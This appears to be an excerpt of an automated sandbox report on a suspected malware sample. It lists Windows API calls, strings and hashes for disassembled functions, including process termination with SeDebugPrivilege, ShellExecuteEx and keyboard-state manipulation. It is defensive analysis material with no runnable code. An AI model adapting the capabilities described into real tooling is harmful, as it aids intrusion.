                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: MessageSend$Window_wcscat
                                • String ID: SysListView32
                                • API String ID: 307300125-78025650
                                • Opcode ID: de1d9095a6fe63667933311097c63bd9ac970dc64548ad70b3f0d5730cdaf27f
                                • Instruction ID: 055bf8774f54787a74de091f7934f3c117b54adc6577027e82d29071105f96a2
                                • Opcode Fuzzy Hash: de1d9095a6fe63667933311097c63bd9ac970dc64548ad70b3f0d5730cdaf27f
                                • Instruction Fuzzy Hash: 9441C370944319AFEB219F64DC85FEF77F8EF08350F1009AAF948A7291DA719D888B54
                                APIs
                                  • Part of subcall function 00B03E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00B03EB6
                                  • Part of subcall function 00B03E91: Process32FirstW.KERNEL32(00000000,?), ref: 00B03EC4
                                  • Part of subcall function 00B03E91: CloseHandle.KERNEL32(00000000), ref: 00B03F8E
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B1ECB8
                                • GetLastError.KERNEL32 ref: 00B1ECCB
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B1ECFA
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B1ED77
                                • GetLastError.KERNEL32(00000000), ref: 00B1ED82
                                • CloseHandle.KERNEL32(00000000), ref: 00B1EDB7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                • String ID: SeDebugPrivilege
                                • API String ID: 2533919879-2896544425
                                • Opcode ID: 12761f91355120e32f6c53f01643ae0c3495bd00a46e195c8ccbb11d0126dcf2
                                • Instruction ID: b8d54d53ad8210a09d49fdef28797c1d740e0b453aa8e6639c7cd9e70eedcbd0
                                • Opcode Fuzzy Hash: 12761f91355120e32f6c53f01643ae0c3495bd00a46e195c8ccbb11d0126dcf2
                                • Instruction Fuzzy Hash: 2E41BB712002019FDB20EF24CD95FBEB7E5AF81714F0880A9F9429B2D2DB75E845CB96
                                APIs
                                • LoadIconW.USER32(00000000,00007F03), ref: 00B032C5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: IconLoad
                                • String ID: blank$info$question$stop$warning
                                • API String ID: 2457776203-404129466
                                • Opcode ID: fe7ec3369ec57f2bfef36de9528448cb89eceb4d972575c392914e4ed7716131
                                • Instruction ID: ddb853ccd15ef94acbd883ec66043301830f7b564065b1c54c2a530cc6066c01
                                • Opcode Fuzzy Hash: fe7ec3369ec57f2bfef36de9528448cb89eceb4d972575c392914e4ed7716131
                                • Instruction Fuzzy Hash: 18113A36208346BFEB015B55DC97E6ABBDCDF19B70F2000EAF901B61C1EAB25F4045A5
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B0454E
                                • LoadStringW.USER32(00000000), ref: 00B04555
                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B0456B
                                • LoadStringW.USER32(00000000), ref: 00B04572
                                • _wprintf.LIBCMT ref: 00B04598
                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B045B6
                                Strings
                                • %s (%d) : ==> %s: %s %s, xrefs: 00B04593
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: HandleLoadModuleString$Message_wprintf
                                • String ID: %s (%d) : ==> %s: %s %s
                                • API String ID: 3648134473-3128320259
                                • Opcode ID: ff2870aa23841a4636cc8083ffe4c11253ed7ddbd3dab1eacdb38400e9a8340f
                                • Instruction ID: e5766c9fca4651bfecb404f4ca70906cd233e55bb6d27dd95916a0f7ede6287e
                                • Opcode Fuzzy Hash: ff2870aa23841a4636cc8083ffe4c11253ed7ddbd3dab1eacdb38400e9a8340f
                                • Instruction Fuzzy Hash: 4E012CF2900209BBE721A7A0DD89EF676BCE708701F4005F5BB49E2051EA749E858B70
                                APIs
                                  • Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623
                                • GetSystemMetrics.USER32(0000000F), ref: 00B2D78A
                                • GetSystemMetrics.USER32(0000000F), ref: 00B2D7AA
                                • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00B2D9E5
                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00B2DA03
                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00B2DA24
                                • ShowWindow.USER32(00000003,00000000), ref: 00B2DA43
                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00B2DA68
                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 00B2DA8B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                • String ID:
                                • API String ID: 1211466189-0
                                • Opcode ID: 3aabeee6aaca3378ca24c87a9b679f1ff5d70883cf1ba217c02cc6a92c345aa0
                                • Instruction ID: d8400b0d5b77e8fe49f9aaf3c33caf28c78ec18bec1ca9f519277fa67c75a2a9
                                • Opcode Fuzzy Hash: 3aabeee6aaca3378ca24c87a9b679f1ff5d70883cf1ba217c02cc6a92c345aa0
                                • Instruction Fuzzy Hash: EFB16871600226ABDF14CF68D9C5BBD7BF1FF45701F0881A9ED489B295DB34A990CB90
                                APIs
                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00ADC417,00000004,00000000,00000000,00000000), ref: 00AA2ACF
                                • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00ADC417,00000004,00000000,00000000,00000000,000000FF), ref: 00AA2B17
                                • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00ADC417,00000004,00000000,00000000,00000000), ref: 00ADC46A
                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00ADC417,00000004,00000000,00000000,00000000), ref: 00ADC4D6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ShowWindow
                                • String ID:
                                • API String ID: 1268545403-0
                                • Opcode ID: 949762e1a0f7eb38cc7835204c5faa64ceb109f83a2e0e91f5594a08406f6ec7
                                • Instruction ID: 68a065e2d03e2b3edf3e796d7b97ba568e344cbf4801ac65b046b7dfe5a077ca
                                • Opcode Fuzzy Hash: 949762e1a0f7eb38cc7835204c5faa64ceb109f83a2e0e91f5594a08406f6ec7
                                • Instruction Fuzzy Hash: 2B41E7712086819BD7358B2C9D9CB7B7BB2AF87350F58882EE047876E1CB75A852D710
                                APIs
                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 00B0737F
                                  • Part of subcall function 00AC0FF6: std::exception::exception.LIBCMT ref: 00AC102C
                                  • Part of subcall function 00AC0FF6: __CxxThrowException@8.LIBCMT ref: 00AC1041
                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00B073B6
                                • EnterCriticalSection.KERNEL32(?), ref: 00B073D2
                                • _memmove.LIBCMT ref: 00B07420
                                • _memmove.LIBCMT ref: 00B0743D
                                • LeaveCriticalSection.KERNEL32(?), ref: 00B0744C
                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00B07461
                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B07480
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                • String ID:
                                • API String ID: 256516436-0
                                • Opcode ID: f742923956f0272ed55bf2206eaabc399343c86616cf4bd85517cd7639681773
                                • Instruction ID: f687e603d7b23ebc5ab4175fce36a19a243c57d7ed7d1cddc129dbdf418d9f67
                                • Opcode Fuzzy Hash: f742923956f0272ed55bf2206eaabc399343c86616cf4bd85517cd7639681773
                                • Instruction Fuzzy Hash: B0319E31A04205EBDF10DF64DD85EAEBBB8EF45710B1540B9F904AB286DB309A51CBA0
                                APIs
                                • DeleteObject.GDI32(00000000), ref: 00B2645A
                                • GetDC.USER32(00000000), ref: 00B26462
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B2646D
                                • ReleaseDC.USER32(00000000,00000000), ref: 00B26479
                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00B264B5
                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B264C6
                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B29299,?,?,000000FF,00000000,?,000000FF,?), ref: 00B26500
                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B26520
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                • String ID:
                                • API String ID: 3864802216-0
                                • Opcode ID: 45ad7f6a2f650e8a29a5232f097b1b649584c610bcab394b5f90b118faa01c95
                                • Instruction ID: e1ba4cdec1a67d0b010a51b711c55c99e58f7f36c322b9c4398636efa8470c6b
                                • Opcode Fuzzy Hash: 45ad7f6a2f650e8a29a5232f097b1b649584c610bcab394b5f90b118faa01c95
                                • Instruction Fuzzy Hash: 83314D72201214BFEB218F50DC4AFFB3FA9EF19765F044065FE089A295DA759C42CB64
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: _memcmp
                                • String ID:
                                • API String ID: 2931989736-0
                                • Opcode ID: 58c2d1dd9d07cc02a250b05a15827ac13013d8f73abb7051bd7e7eb4d84a496c
                                • Instruction ID: 8088a9aaeecc3e297251de461cd7863d84e3189efb45cdffd3b82c1b9a561e10
                                • Opcode Fuzzy Hash: 58c2d1dd9d07cc02a250b05a15827ac13013d8f73abb7051bd7e7eb4d84a496c
                                • Instruction Fuzzy Hash: 9121927170020DBBD614A7629F52FBB33ACAF113B4F144024FF0596693EB55DE2382A5
                                APIs
                                  • Part of subcall function 00AA9997: __itow.LIBCMT ref: 00AA99C2
                                  • Part of subcall function 00AA9997: __swprintf.LIBCMT ref: 00AA9A0C
                                  • Part of subcall function 00ABFEC6: _wcscpy.LIBCMT ref: 00ABFEE9
                                • _wcstok.LIBCMT ref: 00B0EEFF
                                • _wcscpy.LIBCMT ref: 00B0EF8E
                                • _memset.LIBCMT ref: 00B0EFC1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                • String ID: X
                                • API String ID: 774024439-3081909835
                                • Opcode ID: 94c07115bbdf33f2063475c3ab45f4818b13ac1b3b363bb913c70b7f7ea89373
                                • Instruction ID: 9b9657ce30de072ef0dc5431fb9b49d5ec6bd9a6eb4890cc5e1ebb256be6554e
                                • Opcode Fuzzy Hash: 94c07115bbdf33f2063475c3ab45f4818b13ac1b3b363bb913c70b7f7ea89373
                                • Instruction Fuzzy Hash: 03C14D716087019FC724EF24C985A6BBBE4EF85350F0449ADF899972E2DB30ED45CB92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: edf75428be625f4407db6890bd259e27af7efe6a4ba3867c6e1cd673e6165548
                                • Instruction ID: e3d9f6bfb5472975c786c9e470101e9683c1c907b773f677ed137a2adfbdd243
                                • Opcode Fuzzy Hash: edf75428be625f4407db6890bd259e27af7efe6a4ba3867c6e1cd673e6165548
                                • Instruction Fuzzy Hash: D7715C74904109FFCB149F98CC89ABEBB79FF8A310F148159F915AB291C734AA51CFA4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8929b457da7bedd65614a6de39a125e9cb99ea9c30c953d161de771cadbabd6a
                                • Instruction ID: 9551f148d962dea008baac8b5893651fc0455ad2110176d3f82b0833a787c5b4
                                • Opcode Fuzzy Hash: 8929b457da7bedd65614a6de39a125e9cb99ea9c30c953d161de771cadbabd6a
                                • Instruction Fuzzy Hash: 7961CA72508300ABC720EB20CD86EABB3E9EF89710F504A5DB5459B2E2DF709D41C792
                                APIs
                                • IsWindow.USER32(01125920), ref: 00B2B6A5
                                • IsWindowEnabled.USER32(01125920), ref: 00B2B6B1
                                • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00B2B795
                                • SendMessageW.USER32(01125920,000000B0,?,?), ref: 00B2B7CC
                                • IsDlgButtonChecked.USER32(?,?), ref: 00B2B809
                                • GetWindowLongW.USER32(01125920,000000EC), ref: 00B2B82B
                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B2B843
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                • String ID:
                                • API String ID: 4072528602-0
                                • Opcode ID: 784afd687b3ace6a86beaa6d784c0c9502be2a407a749d498296d30e4dc30e7c
                                • Instruction ID: f256f94765be71225125d35d4e8c4c0bce76c93bcc9a5dac9190236f2e562f8b
                                • Opcode Fuzzy Hash: 784afd687b3ace6a86beaa6d784c0c9502be2a407a749d498296d30e4dc30e7c
                                • Instruction Fuzzy Hash: 1A718B34600225AFDB219F64E894FBABBF9FF89300F1444E9E949972A1CF35AC41DB50
                                APIs
                                • _memset.LIBCMT ref: 00B1F75C
                                • _memset.LIBCMT ref: 00B1F825
                                • ShellExecuteExW.SHELL32(?), ref: 00B1F86A
                                  • Part of subcall function 00AA9997: __itow.LIBCMT ref: 00AA99C2
                                  • Part of subcall function 00AA9997: __swprintf.LIBCMT ref: 00AA9A0C
                                  • Part of subcall function 00ABFEC6: _wcscpy.LIBCMT ref: 00ABFEE9
                                • GetProcessId.KERNEL32(00000000), ref: 00B1F8E1
                                • CloseHandle.KERNEL32(00000000), ref: 00B1F910
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                • String ID: @
                                • API String ID: 3522835683-2766056989
                                • Opcode ID: 28bfd0858d8d679dd3957d6e8f1e0fc6a442d911c6e7f6e030d494668b5d7785
                                • Instruction ID: 72e1ab9171eb63384605c2a2845843455b8e7742344f2e0d5fab9b76e0f0ecf9
                                • Opcode Fuzzy Hash: 28bfd0858d8d679dd3957d6e8f1e0fc6a442d911c6e7f6e030d494668b5d7785
                                • Instruction Fuzzy Hash: B0619275A0061ADFCF14EF54C5819AEBBF5FF49310F1484A9E855AB3A1CB31AD41CB90
                                APIs
                                • GetParent.USER32(?), ref: 00B0149C
                                • GetKeyboardState.USER32(?), ref: 00B014B1
                                • SetKeyboardState.USER32(?), ref: 00B01512
                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 00B01540
                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 00B0155F
                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00B015A5
                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B015C8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
